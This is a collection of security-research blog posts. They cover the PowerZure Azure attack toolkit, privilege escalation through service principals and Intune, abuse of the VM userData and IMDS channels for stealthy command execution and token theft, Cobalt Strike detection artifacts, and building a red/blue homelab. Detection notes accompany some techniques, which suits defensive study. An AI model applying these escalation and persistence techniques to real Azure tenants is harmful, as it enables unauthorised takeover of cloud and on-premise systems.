PowerZure 2.1 Update

It’s been almost a year since my Azure exploitation project PowerZure received an update and in the changing world of Azure/cloud, that means several things broke. PowerZure will now continue to be my focus and receive regular support & updates, starting with the latest release, version 2.1. Several things have been changed and added, some of which need to be explained a bit.

Get-AzureManagedIdentities

This function will gather all Managed Identities in Azure. It works by gathering all service principals and viewing their application’s URI. If the URI contains ‘identity.azure.net’, then it’s an MI. PowerZure then maps this to their role.

Figure 1: Viewing Managed Identities in Azure

Invoke-AzureCustomScriptExtension

Currently this is a wrapper cmdlet, however after a bug is fixed in the Azure REST API it will allow execution on VMs via CustomScriptExtension without requiring any files.

Get-AzurePIMAssignment

I don’t know why Az module didn’t have a cmdlet for requesting PIM assignments, so I made one. Currently this only gathers AzureRM assignments. The AzureAD cmdlet for PIM is broke currently as the underlying Graph API request returns a 401 for any user.

Figure 2: Getting the PIM assignments in Azure.

Invoke-AzureVMUserDataAgent & Invoke-AzureVMUserDataCommand

These two functions abuse the ‘userData’ property on virtual machines in Azure

Figure 3: The ‘userdata’ field on a VM.

The userData field can be updated by users with VM write access and the VM can retrieve this property internally from the IMDS REST API. By setting up an “agent” (in this functions context, a Scheduled Task), the VM can routinely check the userData property for any commands passed in and execute them.

Figure 4: Abuse architecture for userData property.

The output is then put back into the userData property which is then readable by anyone with VM Read access. While a bit complex, this way of command execution leaves behind no logs in Azure Event Log. This technique can be abused with Invoke-AzureVMUserDataAgent, which uploads the “agent” which is just a scheduled task and some other things, and with Invoke-AzureVMUserDataCommand, which will pass in a command to the userData property and wait for output from the agent.

Invoke-AzureMIBackdoor

Invoke-AzureMIBackdoor abuses the fact that Azure VMs do not require authentication to request data from the IMDS REST API. When a Managed Identity is configured on an Azure VM, the VM can request a Json Web Token (JWT) to login as the MI via a request to IMDS. Since the VM can do this without authentication, it can be abused by exposing the IMDS REST API to the internet. By default, the IMDS REST API is only accessible internally to the VM, but through portproxying, it can be exposed to the internet which allows anyone to request a JWT for the Managed Identity. Once again, this leaves behinds no logs in Azure Event Log and can be used as a very stealthy way of persistence.

This function by default will use RDP for portproxying, meaning web requests will be forwarded from the VM to IMDS over 3389. This will break RDP until that portproxy rule is removed. There’s the -NoRDP option in PowerZure to open up a firewall port in the Network Security Group (NSG) firewall if you want to use a different port. This will obviously generate more logs.

Figure 5: Requesting an MI JWT from the internet.

Bug Fixes

  • Add-AzureSPSecret – now uses Azure REST API instead of the cmdlets to add a secret to a service principal. The secret is autogenerated. If you get a 405 error, ensure you have the correct permissions and are logged in with the correct account.
  • Gathering Graph API tokens is now more reliable and shouldn’t expire.
  • Get-AzureADUserMembership fixed
  • Get-AzureTargets more reliable and neater output
  • Set-AzureSubscription now is an interactive menu. Useful for not having to remember or write down UIDs.

Thank you for the continued support of PowerZure, I’m more than happy to help anyone with debugging issues, you can reach out to me directly on Twitter.

Abusing and Detecting Alternative Data Channel Command Execution on Azure Virtual Machines

Currently, command execution on virtual machines (VM) in Azure happens through the cmdlet Invoke-AzVMRunCommand. There are other specific ways, such as using an Azure Runbook if a RunAs account is being used. However, after some experimentation, there is another data channel that can be abused by Azure VMs to allow an attacker to run commands on a machine without the use of Invoke-AzVMRunCommand* by leveraging userData. The asterisk (*) is there because technically Invoke-AzVMRunCommand is needed once to setup this technique. Before getting into the code and examples, a few things must be covered.

The userData field on an Azure VM is used to include setup scripts or other metadata during provisioning. Through the portal, it looks like this:

Figure 1: Modifying the ‘user data’ field on an Azure VM.

While intended to be used for provisioning, it is also possible to modify the contents of this property even after the VM is created. The VM is able to fetch this property through a REST API call.

$userData = Invoke-RestMethod -Headers @{"Metadata"="true"} -Method GET -NoProxy -Uri "http://169.254.169.254/metadata/instance/compute/userData?api-version=2021-01-01&format=text"
[System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($userData))
Figure 2: Calling the REST API to gather the ‘userdata’ property contents from within the VM.

The REST API in this case runs on the Azure Instance Metadata Service (IMDS). IMDS is intended to be something query-able from the VM in order to fetch metadata about itself, such as name, region, disk space, etc. and is only able to be reached by the localhost as the security boundary for IMDS is the resource it is bound to, which in this case it is the virtual machine. The userData property can then be retrieved through the VM locally over 169.254.169.254 via IMDS and it can also be edited through the Azure portal and Graph REST API.

Invoke-RestMethod -Method PATCH -Uri https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachines/{vmName}?api-version=2021-07-01 -Body $Json -Header $Headers -ContentType 'application/json'

While the local VM can query the IMDS REST API with a GET request, GET is the only approved verb, meaning PUT and PATCH was not possible with the http://169.254.169.254/metadata/instance URI (IMDS), meaning the local VM cannot modify any metadata (including userData) through IMDS. The metadata can only be modified with the Azure REST API. The permission needed to modify this property is Microsoft.Compute/virtualMachines/write which is included in your typical VM management RBAC roles (VM Contributor, Contributor, etc.).

To summarize:

  • VMs can locally retrieve the userData property from the IMDS REST API
  • Users can modify this property through the portal or Azure REST API

The hypothesized technique then looks like this:

The first challenge was then automating the Azure VM to poll the IMDS REST API for the userData field. If commands are constantly sent, then the VM will have to autonomously make the request to IMDS, decode the command, then run the command. Basically, the VM needs an agent. The simplest method I could think of for a basic agent, was to create a PowerShell script that can be uploaded with Invoke-AzVMRunCommand and will do three things:

  1. Create a Scheduled Task that will run the script when an Event occurs. The chosen event was an Azure-specific event ID that happens several times every minute, ensuring the script is constantly executing.
  2. Make the IMDS REST API request to retrieve the uploaded data/command.
  3. Run the command and upload the result back to the userData field

The final challenge was then sending back the output of the command that was run. Since VMs cannot upload data to IMDS, but it is possible to upload over Azure REST, then including the Azure REST AccessToken in the original uploaded data would allow the VM to make authenticated requests to the Azure REST API and thus use the URI https://management.azure.com/subscriptions/ which does support PATCH & PUT.

To summarize the full technique:

  • By using Invoke-AzVMRunCommand, a PowerShell script is uploaded that will act as an “agent”. The script is autonomous and will deploy a Scheduled Task that will execute the rest of the script on an Event.
  • The initial upload to the userData field that contains the arbitrary command to be run will also include the Azure REST API access token. The data that is uploaded to the userData property will then be the arbitrary command to be run and the Azure REST API access token.
  • The VM will call the IMDS REST API to get the contents of the userData property, decode it, run the command, then use the Azure REST API to make a PUT request to upload the results of the command, which is done by using the smuggled access token.
  • The userData property can then be queried again to see the results of the command.

In PowerZure, this can now be accomplished with the two commands Invoke-AzureVMUserDataCommand and Invoke-AzureVMUserDataAgent.

Detection and Threat Hunting Azure Alternate Data Channels

There’s several assumptions made for this attack to be successful.

  1. The account used to upload data has VM write privileges
  2. Invoke-AzVMRunCommand is able to be executed by users without approval
  3. The VM is on and running

If any of these assumptions are not true, then the technique will fail. In addition, there’s several artifacts left behind by this technique.

  • The scripting agent from PowerZure is located in C:\WindowsAzure\SecAgent\AzureInstanceMetadataService.ps1
  • Invoke-AZVmRunCommand leaves behind the command or script that was run in C:\Packages\Plugins\Microsoft.CPlat.Core.RunCommandWindows\1.1.9\Downloads

Within Azure, Invoke-AzVMRunCommand will leave behind a log in the Activity log.

These logs should always trigger alerts and should be reviewed. Finally, since commands are just being executed from within the PS script agent, PowerShell logging will capture all activity. I personally have never seen the ‘userData’ field ever populated in the Azure portal, so check if anything is there and review its purpose.

Acknowledgements

Special thank you to @_wald0, @jsecurity101, and @matterpreter.

Attacking Azure & Azure AD, Part II

Abstract

When I published my first article, Attacking Azure & Azure AD and Introducing PowerZure, I had no idea I was just striking the tip of the iceberg. Over the past eight months, my co-worker Andy Robbins and I have continued to do a lot of research on the Azure front. We’ve recently found some interesting attack primitives in customer environments that we wouldn’t have normally thought of in a lab. This blog post will cover these attack primitives, as well as introduce the re-write of PowerZure by releasing PowerZure 2.0 along with this article.

Azure vs. Azure AD

Before I jump straight into the attacks, I want to clarify some confusion around Azure & Azure Active Directory (AD), as I know this boggled my mind for quite some time.

Azure AD is simply the authentication component for both Azure and Office 365. When I speak of Azure (without the “AD”) I’m referring to Azure resources; where subscriptions, resource groups, and resources live.

The biggest thing to know about these two components is that their role-based access control systems are separate. Meaning a role in Azure AD does not mean you have that role in Azure. In fact, the roles are completely different between the two and share no common role definitions.

Roles in Azure & Azure AD are simply containers for things called ‘definitions’. Definitions are comprised of ‘actions’ and ‘notactions’ which allow you to do things on certain objects. For example, the role definitions for the ‘Global Administrator’ role in Azure AD looks like this:

$a = Get-AzureADMSRoleDefinition | Where-object {$_.DisplayName -eq 'Company Administrator'}$a.RolePermissions.AllowResourceActions
Figure 1: List of actions from the role definition of the Global/Company Administrator role in Azure AD

Notice the ‘microsoft.directory’ namespace. That entire namespace is restricted to Azure AD.

Comparatively, the role definitions for ‘Contributor’ in Azure looks like this

Get-AzRoleDefinition

Figure 2: List of actions and not actions for the ‘Contributor’ role in Azure

Notice that for the Contributor role in Azure, the ‘actions’ property has wildcard (*). This means it can do anything to resources in Azure. However, the ‘NotActions’ property defines what it cannot do, which for the Contributor role, means it cannot add or remove users to resources which is defined in the Microsoft.Authorization/*/Write definition. That is restricted to the ‘Owner’ role.

Azure AD Privilege Escalation via Service Principals

Applications exist at the Azure AD level and if an application needs to perform an action in Azure or Azure AD, it requires a service principal account in order to do that action. Most of the time, service principals are created automatically and rarely require user intervention. On a recent engagement, we discovered an Application’s service principal was a Global Administrator in Azure AD. We then scrambled to find out how to abuse this, as it’s well known you can login to Azure PowerShell as a service principal. We then looked at the ‘Owners’ tab of the Application and saw a regular user was listed as an Owner.

Figure 3: Example of the ‘Owners’ tab on an application

Owners of applications have the ability to add ‘secrets’ or passwords (as well as certificates) to the application’s service principal so that the service principal can be logged in.

Figure 4: Example of the ‘Certificates and Secrets’ tab on an application

The low privileged user could then add a new secret to the service principal, then login to Azure PowerShell as that service principal, who has Global Administrator rights.

The next question we had, was how far could this be abused? So, as Global Administrator, we control Azure AD, but how can we control Azure resources?

Sean Metcalf published an article explaining that Global Administrators have the ability to click a button in the Azure portal to give themselves the ‘User Access Administrator’ role in Azure. This role allows you to add and remove users to resources, resource groups, and subscriptions, effectively meaning you can just add yourself as an Owner to anything Azure.

At a first glance, this toggle switched looked only available in the portal and since service principals cannot login to the portal, I thought I was out of luck. After digging through some Microsoft documentation, there’s an API call that can make that change. After making this a function in PowerZure (Set-AzureElevatedPrivileges), I logged into Azure PowerShell as the service principal and executed the function which gave an odd result.

Figure 5: Unknown errors are the best

As it turns out, after a GitHub issue was opened & answered, this API call cannot be executed by a service principal.

So putting our thinking caps back on, we thought of other things a Global Administrator can do — like creating a new user or assigning other roles! So, as the service principal, we created a new user, then also gave that user the Global Administrator role. I logged in as the new user, executed the API call, and it successfully added the ‘User Access Administrator’ role to them, meaning I now controlled Azure AD and Azure, which all started from a low-privileged user as an Owner on a privileged Application’s Service Principal.

Figure 6: The service principal privilege escalation abuse

Moving from Cloud to On-Premise

With Azure and Azure AD compromised, our next goal was to figure out a way to move from Azure into an on-premise domain. While exploring our options, we found that Microsoft’s Mobile Device Management (MDM) platform, Intune, wasn’t just for mobile devices. Any device, meaning even on-premise workstations & servers, can also be added to Intune. Intune allows administrators to perform basic administrative tasks on Azure AD joined devices, such as restarting, deployment of software packages, etc. One of the things we saw, was that you can upload PowerShell scripts to Intune which will execute on a [Windows] device as SYSTEM. Intune is technically an Azure AD resource, meaning only roles in Azure AD affect it. Since we had Global Administrator privileges, we could upload PowerShell scripts at will to Intune. The devices we wanted to target, to move from cloud to on-premise, were ‘hybrid’ joined devices, meaning they were both joined to on-premise AD and Azure AD.

Figure 7: Windows 10 Device is Hybrid Azure AD Joined + Managed by Intune

To do this, we used the Azure Endpoint Management portal as our new user to upload the PowerShell script.

Figure 8: Adding a PowerShell script to Intune

In Intune, there’s no button to “execute” scripts, but they automatically execute when the machine is restarted and every hour. After a few minutes of uploading the script (which was a Cobalt Strike beacon payload), we successfully got a beacon back and moved from cloud to on-premise.

Figure 9: Using InTune to gain access to a Windows Machine.

This can also be abused purely through PowerZure using the New-AzureIntuneScript and Restart-AzureVM functions.

Figure 10: Abusing InTune with PowerZure

Abusing Logic Apps

Of the many things we’ve researched in Azure, one interesting abuse we found came from a Logic App.

Azure Logic Apps is a cloud service that helps you schedule, automate, and orchestrate tasks, business processes, and workflows when you need to integrate apps, data, systems, and services across enterprises or organizations -Microsoft

Logic Apps have two components: a trigger and an action. A trigger is just something that can be enabled to put the action into effect. For example, you can make an HTTP request a trigger, so when someone visits the URL, the trigger enables the action(s). An action is what you want the actual logic app to do. There’s literally hundreds of actions for multiple services, even some from third party applications and you can even create a custom action (might be interesting).

Figure 11: List of services available that have actions in a logic app. Notice the scroll bar.

One that particularly stood out was AzureAD.

Figure 12: List of Azure AD actions available

Unfortunately, there wasn’t any really juicy actions like adding a role to a user, but the ability to create a user was an interesting case for a backdoor and adding a user to a group could mean privilege escalation if certain permissions or roles are tied to that group.

Figure 13: Example layout of a logic app. When that URL is visited, it creates an AAD group.

The question then was “What privileges does this logic app action fire as?”. The answer is that logic apps use a connector. A connector is an API that hooks in an account to the logic app. Of the many services available, there’s many that have a connector, including Azure AD. The interesting part of this abuse was that when I logged into the connector, it persisted across accounts, meaning when I logged out and switched to another account, my original account was still logged into the connector on the logic app.

Figure 14: The connector on the action of the logic app.

The abuse then, is that you’re a Contributor over a logic app which is using a connector, then you can effectively use that connector account to perform any available actions, provided the connector account has the correct role to do those actions.

Figure 15: ‘intern’ is a Contributor over the logic app, which ‘hausec’ is used as a connector account, meaning intern can use ‘hausec’s roles for any actions available.

Due to the sheer amount of actions available in a logic app, I chose not to implement this abuse into PowerZure at this time, however you can enumerate if a connector is being used using the Get-LogicAppConnector function.

PowerZure 2.0

I’m happy to announce that I’ve re-written all of PowerZure to follow more proper coding techniques, such as using approved PowerShell verbiage, returning objects, and removal of several wrapper-functions. One of the biggest changes was the removal of the Azure CLI module requirements, as PowerZure now only requires the Az PowerShell & AzAD module to reduce overhead for users. Some Azure AD functions have been converted to Graph API calls. Finally, all functions for PowerZure now contain ‘Azure’ after the verb, e.g. Get-AzureTargets or Get-AzureRole .

If you haven’t already seen it, PowerZure now has a readthedocs page which can be viewed here: https://powerzure.readthedocs.io/en/latest/ which has an overview of each function, its syntax & parameters, and its output example. The aim is to make this much more easily adopted by people getting into Azure penetration testing & red teaming.

With PowerZure 2.0, there’s some new functions being released with it:

  • Get-AzureSQLDB — Lists any available SQL databases, their servers, and the administrative user
  • Add-AzureSPSecret — Adds a secret to a service principal
  • Get-AzureIntuneScript — Lists the current Intune PowerShell scripts available
  • New-AzureIntuneScript — Uploads a PowerShell script to Intune which will execute by default against all devices
  • Get-AzureLogicAppConnector — Lists any connectors being used for logic apps
  • New-AzureUser — Will create a user in AAD
  • Set-AzureElevatedPrivileges — Elevates a user’s privileges in AAD to User Access Administrator in Azure if that user is a Global Administrator

As part of any upgrade, several old bugs were fixed and overall functionality has been greatly improved as well. My goal is to put any potential abuses for Azure & Azure AD into PowerZure, so as our research journey continues I’m sure there will be more to come.


Special Thanks to @_wald0 for helping with some of the research mentioned here.

Cobalt Strike and Tradecraft

It’s been known that some built-in commands in Cobalt Strike are major op-sec no-no’s, but why are they bad? The goal of this post isn’t to teach you “good” op-sec, as I feel that is a bit subjective and dependent on the maturity of the target’s environment, nor is it “how to detect Cobalt Strike”. The purpose of this post is to document what some Cobalt Strike techniques look like under the hood or to a defender’s point of view. Realistically, this post is just breaking down a page straight from Cobalt Strike’s website, which can be found here. I won’t be able to cover all techniques and commands In one article, so this will probably be a two part series.

Before jumping into techniques and the logs associated with them, the baseline question must be answered: “What is bad op-sec?”. Again, this is an extremely subjective question. If you’re operating in an environment with zero defensive and detection capabilities, there is no bad op-sec. While the goal of this article isn’t to teach “good op-sec”, it still has a bias towards somewhat mature environments and certain techniques will be called out where they tend to trigger baseline or low-effort/default alerts & detections. My detection lab for the blog post is extremely simple: just an ELK stack with Winlogbeat & Sysmon on the endpoints, so I’m not covering “advanced” detections here.

Referencing the op-sec article from Cobalt Strike, the first set of built-in commands I’d like to point out are the ‘Process Execution’ techniques, which are run, shell, and pth.

These three commands tend to trigger several baseline alerts. Let’s investigate why.

Shell

When an operator uses the shell command in Cobalt Strike, it’s usually to execute a DOS command directly, such as dir, copy, move, etc. Under the hood, the shell command calls cmd.exe /c.

With Sysmon logging, this leaves a sequence of events, all around Event Code 1, Process Create.

We can see here that the shell command spawns cmd.exe under the parent process. whoami though, is also actually an executable within System32, so cmd.exe also spawns that as a child process. But, before that occurs, conhost.exe is called in tandem with cmd.exe. Conhost.exe is a process that’s required for cmd.exe to interface with Explorer.exe. What is unique, is how Conhost.exe is created:

In this case, Conhost.exe’s arguments are 0xffffffff -ForceV1, which tells Conhost which application ID it should connect to. Per Microsoft:

The session identifier of the session that is attached to the physical console. If there is no session attached to the physical console, (for example, if the physical console session is in the process of being attached or detached), this function returns 0xFFFFFFFF.”

A goal of op-sec is to always minimize the amount of traffic, or “footprints” that your activities leave behind. As you can see, shell generates quite a few artifacts and it’s common for detections to pick up as cmd.exe /c is seldom used in environments.

PTH

The PTH, or pass-the-hash, command has even more indicators than shell.

From Cobalt Strike’s blog https://blog.cobaltstrike.com/2015/12/16/windows-access-tokens-and-alternate-credentials/:

“The pth command asks mimikatz to: (1) create a new Logon Session, (2) update the credential material in that Logon Session with the domain, username, and password hash you provided, and (3) copy your Access Token and make the copy refer to the new Logon Session. Beacon then impersonates the token made by these steps and you’re ready to pass-the-hash.”

This creates several events.

First, the ‘spawnto’ process that is dictated in the Cobalt Strike profile is created, which in my case is dllhost.exe. This becomes a child process of the current process.  This is used as a sacrificial process in order to “patch” in the new logon session & credentials.

Then a new logon session is created, event ID 4672.

The account then logs on to that new session and another event is created with the ID of 4624.

In this new logon session, cmd.exe is spawned as a child process of dllhost.exe and a string is passed into a named pipe as a unique identifier.

Now, according to the logon session attached to the parent process (dllhost.exe), ADMAlice is the logged in user.

Finally, Conhost.exe is again called since cmd.exe is called. The unique arguments that hide the cmd.exe window are passed into Conhost.

Now, whenever the operator attempts to login to a remote host, the new logon session credential will be attempted first.

Run

The run command is a bit different than PTH and Shell, it does not spawn cmd.exe and instead calls the target executable directly.

Once again though, Conhost is called with the unique arguments.

While the arguments for Conhost aren’t inherently malicious, it is a common identifier for these commands.

execute works similarly to run, however no output is returned.

Powershell

The powershell command, as you can probably guess, runs a command through PowerShell. Powershell.exe is spawned as a child process but the parent PID can be changed with the ppid command. In this case, though, the ppid is kept to the original parent process.

Conhost is again called.

The major problem with the powershell command is that it always adds unique arguments to the command and encodes the command in base64.

This results in a highly signature-able technique as it is not common to see legitimate PowerShell scripts to run as base64 encoded with the -exec bypass flag.

Powerpick

Powerpick is a command that uses the “fork-and-run” technique, meaning Cobalt Strike creates a sacrificial process to run the command under, returns the output, then kills the process. The name of the spawnto process is defined in the Cobalt Strike profile on the teamserver. In my case, it’s dllhost.exe.

When running a powerpick command, such as powerpick whoami, three processes are created: Dllhost.exe (SpawnTo process), Conhost.exe, and whoami.exe.

While Powerpick does not spawn powershell.exe, there’s still op-sec considerations. In this case, this behavior would look somewhat suspicious because of the parent process of ‘whoami.exe’ is ‘dllhost.exe’. Typically, when a user runs ‘whoami’ it’s going to be in the context of cmd.exe or powershell.exe.

Figure 1: What a normal use of ‘whoami’ looks like

The op-sec consideration here is to be aware of what your parent process is and what process you’ll be spawning. Always try to keep parent-child process relationships as ‘normal’ looking as possible. Dllhost.exe with a child process of ‘whoami.exe’ is not normal.

Similarly, these other commands utilize the “fork-and-run” technique and you can expect similar events:

  • chromedump
  • covertvpn
  • dcsync
  • execute-assembly
  • hashdump
  • logonpasswords
  • mimikatz
  • net *
  • portscan
  • pth
  • ssh
  • ssh-key

Spawnas

The spawnas command will create a new session as another user by supplying their credentials and a listener.

Since this is effectively just re-deploying a payload on the host, there’s several events associated with it.

First, a special logon session is created

If the spawnas command is run as an elevated user, the new session will have a split token, meaning two sessions are created: One privileged and another unprivileged.

Next, a 4648 event will be created, notifying of a logon with explicitly provided credentials

Then a new process will be created under that new session, which is whatever the spawnto process is set in the profile.

That process is now the beacon process for that logon session and user. It’s a child process of the original beacon’s process.

There are several techniques that were not covered in this post that are considered more “op-sec” friendly as they do not leave behind glaring obvious events behind like the ones covered so far. Some examples of these are:

  • Beacon Object Files (BOF)
  • Shinject
  • API-Only calls such as upload, mkdir, downloads, etc.

I do plan on covering detection for these in a later post.

Creating a Red & Blue Team Homelab

Over the years of penetration testing, red teaming, and teaching, I (and I’m sure a lot of others) are often asked how to get started in infosec. More specifically, how to become a pentester/red teamer or threat hunter/blue teamer. One of the things I always recommend is to build out a lab so you can test TTPs (techniques, tactics, procedures) and generate IOCs (indicators of compromise) so that you can understand how an attack works and what noise it generates, with the aim of being either to detect that attack or modify it so it’s harder to detect. It’s not really an opinion, but a matter of fact, that being a better blue teamer will make you a better red teamer and vice-versa. In addition, one of the things that I ask in an interview and have always been asked in an interview, is to describe what your home lab looks like. It’s almost an expectation as it is so crucial to be able to experiment with TTPs in a non-production environment. This post is aimed to help you create a home lab that will allow you to both do red team and blue team activity.

Hardware

One of the first questions that’s asked about a home lab is the cost. There’s a few ways to answer this.

  1. Host everything locally on your PC/laptop.
  2. Host everything on a dedicated server
  3. Host everything in the cloud

The other question is what is the necessary size of the lab? Home-labs do not have to replicate the size of an enterprise company. My home lab is setup as shown below, which is what will act as a template for this post.

Figure 1: One of many ways to set up a home lab

In my person lab I run two Windows Servers and three Windows workstations. You could absolutely just have one server and one workstation, it’s just a matter of what you’re trying to accomplish. So, to answer the question of “what will it cost”, the answer is “it depends”. Personally I use a computer to act as a server which cost me about $400 to build which runs ESXI 7 to host all the VMs. Cloud could initially be cheaper, but in the long run it will probably cost more. I used to run everything locally on my work PC but I started to run out of disk space with all the VMs. As far as this guide goes, however you choose to host your VMs is up to you.

Hosting OS links:

Server Operating Systems:

ESXI 7

Hyper-V

Workstation Applications:

VMWare Workstation Player

Virtual Box

Cloud:

AWS

Azure

Architecture

How your lab is architected/laid out is a big deal. You want to mimic a real environment as much as possible which is why I suggest building a lab that runs Window’s Active Directory (AD). I don’t think I’ve been in an environment where AD was not being used. We will start by using Windows evaluation licenses.

Windows 10

Windows Server 2019

And we will use Debian 10 to build an ELK (Elasticsearch, Logstash, Kibana) server.

Debian 10

Finally, for our attacking machine and for simplicity we will just use Kali

Kali Linux

ELK Setup

Before setting up Windows, we will set up an ELK server. ELK (Elasticsearch, Logstash, Kibana) is a widely used platform for log processing. As a blue teamer, you want this because digging through logs is a key piece to threat hunting. As a red teamer, you want this to know what IOCs are generated from the TTPs you use.

Keep in mind this lab is meant to be for internal, private use only. The setup of these servers will not be secure and should not be used in a production environment.

Start off by downloading the Debian 10 ISO and then create a VM to boot off the ISO. I won’t go into the specifics on creating a VM as it’s platform specifics (e.g. VirtualBox, VMWare, etc.), but there’s a good article here for VMWare.

Once you install Debian and log in, you’ll want to first add your current user to the sudoers group. First, escalate to root:

sudo su

Then add your user to the sudoers group.

sudo usermod -aG sudo [username]

Then switch back to your user

su [username]

Next, add the GPG key for the Elastic repository

wget -qO - https://artifacts.elastic.co/GPG-KEY-elasticsearch | sudo apt-key add -

And add the repository definition

echo "deb https://artifacts.elastic.co/packages/7.x/apt stable main" | sudo tee -a /etc/apt/sources.list.d/elastic-7.x.list

Now update apt

sudo apt-get update

And install logstash

sudo apt-get install logstash

Then Java

sudo apt-get install openjdk-11-jre

Then install Elasticsearch

sudo apt-get install elasticsearch

and finally Kibana

sudo apt-get install kibana

Next is to enable services

sudo /bin/systemctl enable elasticsearch.service && sudo /bin/systemctl enable kibana.service && sudo /bin/systemctl enable logstash.service

Before we start the services, there’s a few config changes we need to make.

sudo nano /etc/kibana/kibana.yml

Uncomment server.host and set the IP to 0.0.0.0 to listen on all interfaces and uncomment server.port. You can leave the port to 5601.

Figure 2: Setting the Kibana Config file

Save the file (ctrl+O, Enter, ctrl+x)

and now edit the elasticsearch config file

sudo nano /etc/elasticsearch/elasticsearch.yml

Set the network.host line to 0.0.0.0 and http.port to 9200

Figure 3: Setting the Elasticsearch config settings

And add an additional line at the bottom

discovery.type: single-node

Save the file (ctrl+O, Enter, ctrl+x)

And start the services

sudo service logstash start
sudo service elasticsearch start
sudo service kibana start

Now if you browse to your Debian machine’s IP on port 5601 you should see Kibana.

ip addr
Figure 4: Viewing the host’s IP
Figure 5: Kibana/Elastic homepage

Windows Setup

Once again, I will not be showing how to deploy a VM as I want this post to be platform agnostic. So for setting up Windows, this will be under the impression you have stood up a Windows 2019 Server and Windows 10 machine.

In this section we will create an Active Directory lab by making a Domain Controller and Workstation.

Windows Server 2019

Once Server 19 is stood up, the first thing you should do is set a static IP. If you don’t, the machine’s IP can change which will break the environment. For reference, these are my settings.

Figure 6: Server’s IP settings

The import part here is setting the DNS servers. The preferred DNS will be localhost (127.0.0.1) as we will install the DNS service on the machine in a moment. Then setting Google’s DNS server as a secondary so it can reach the internet (optional, completely OK if you do not want your lab to reach the internet).

Next, rename the server to something more conventional. I named mine PRIMARY as it will act as the primary domain controller in the environment.

Figure 7: Go to Start>Type in “rename” and this is the screen that will be brought up
Figure 8: Renaming the server to PRIMARY

Reboot the server for the new settings to take effect. Once rebooted, you should have the server manager dashboard. Click on ‘Add roles and features’

Figure 9: Server Manager Dashboard

Click next until you get to ‘Server Roles’. Add DNS and Active Directory Domain Servers

Figure 10: Adding DNS and ADDS services

Click next until it asks for confirmation, then click install.

Figure 11: Installing features

After it installs, the server dashboard will have a notification. Click on it and click ‘Promote this server to a domain controller’

Figure 12: Promote the machine to a DC

Once you click promote, it will bring up another window. Click ‘Add a new forest’ and give the domain a name. I named mine ‘LAB.LOCAL’

Figure 13: Give your domain a name

Next, leave the default functional levels (Unless you’re adding a 2012, 2008, or 2003 server, then change it to those). Then set the DSRM password to something you’ll remember.

Figure 14: Setting the DSRM password

Click next until you get to the prerequisite check, then click ‘install’.

Figure 15: Prereq check will give warnings

Once done, reboot the server.

Once rebooted, in the Server Dashboard, click on Tools>ADUC (Active Directory Users and Computers)

Figure 16: Tools>ADUC

ADUC is used to manage users, groups, and computers (among other things). In this instance we just want to create a new user and assign them to the Domain Administrator role.

In ADUC, click on your domain on the left then select ‘Users’. At the top, click the icon shown below to create a new user.

Figure 17: Creating a new user in ADUC

Give them a name where you can identify them as an administrator by their name. Commonly in environments, they have ADM, ADMIN, -A, or some moniker to signify it’s a privileged account. Once created, right click on that user in ADUC and click ‘Add to a group’

Figure 18: Adding the user to a group

Then type in ‘Domain Admins’ and select ‘OK’.

Figure 19: Adding the user to the Domain Admins group

Once the user is added to the Domain Admins group, switch over to the Windows 10 workstation. Once again, I will assume the provisioning of the machine was already done and it is able to communicate with the domain controller. A simple test is to ping the Domain Controller’s IP and ensure they can talk to each other on the network.

On the Windows 10 machine, edit the DNS settings to include your Domain Controller’s IP address. Below is a shown example.

Figure 20: Networking settings for Windows 10

Click on the Windows icon, type in ‘join domain’ and open up ‘Access work or school’. Click on the ‘Connect’ button and then click ‘join this device to a local Active Directory domain’.

Figure 21: Select the highlighted box

Enter the FQDN (Fully qualified domain name) of your domain and click ‘next’.

Figure 22: Enter the FQDN of your domain.

Note: If you get an error saying the domain was unable to be found, double check your DNS settings and ensure the Windows 10 machine can reach the Domain Controller.

You will then be prompted for credentials. This is where you will input your newly created Domain Administrator’s credentials.

Figure 23: Enter your DA’s credentials to join the domain

Reboot the PC and it will then be joined to the domain.

Winlogbeat

Now that we have a workstation and domain controller as well as an ELK server, we need to configure our two Windows machines to send logs to the ELK server. To do this, we need a program called ‘Winlogbeat‘. In addition, I recommend also installing Sysmon. Download the .zip file for Winlogbeat and unzip it to a folder inside one of the Windows machines. Open a PowerShell window and navigate to the Winlogbeat directory in PowerShell. Run the following command

Set-ExecutionPolicy bypass

Select [a] when prompted

Then run the script

 .\install-service-winlogbeat.ps1
Figure 24: Installing Winlogbeat

Next, open “winlogbeat.yml” in Notepad. Copy+paste the following while changing the “hosts” IPs to match your ELK’s server IPs.

======================= Winlogbeat specific options ==========================
 winlogbeat.event_logs:
 name: Application
 ignore_older: 30m
 name: Security
 ignore_older: 30m
 name: System
 ignore_older: 30m
 name: Microsoft-windows-sysmon/operational
 ignore_older: 30m
 name: Microsoft-windows-PowerShell/Operational
 ignore_older: 30m
 event_id: 4103, 4104
 name: Windows PowerShell
 event_id: 400,600
 ignore_older: 30m
 name: Microsoft-Windows-WMI-Activity/Operational
 event_id: 5857,5858,5859,5860,5861 
 output.elasticsearch:
   hosts: ["ELKIPHERE:9200"]
   username: "elastic"
   password: "changeme"
 setup.kibana:
   host: "ELKIPHERE"

Then start the winlogbeat service

Start-Service winlogbeat
Figure 25: Starting winlogbeat

Once the service is started you can verify that the connection works by running

.\winlogbeat setup -e
Figure 26: Checking winlogbeat config file

Click the drop down menu on the side and under ‘Analytics’ and go to ‘Discover’. You should now be seeing Windows logs.

Figure 28: Viewing Windows Logs

Ensure that the time is synchronized properly within your lab as those are the times that will be reflected with the logs in Kibana. Otherwise, you can set your time filter to a different time.

Your basic detection lab is now ready to go! As said earlier, I recommend installing Sysmon on the Windows hosts to get detailed events out of them.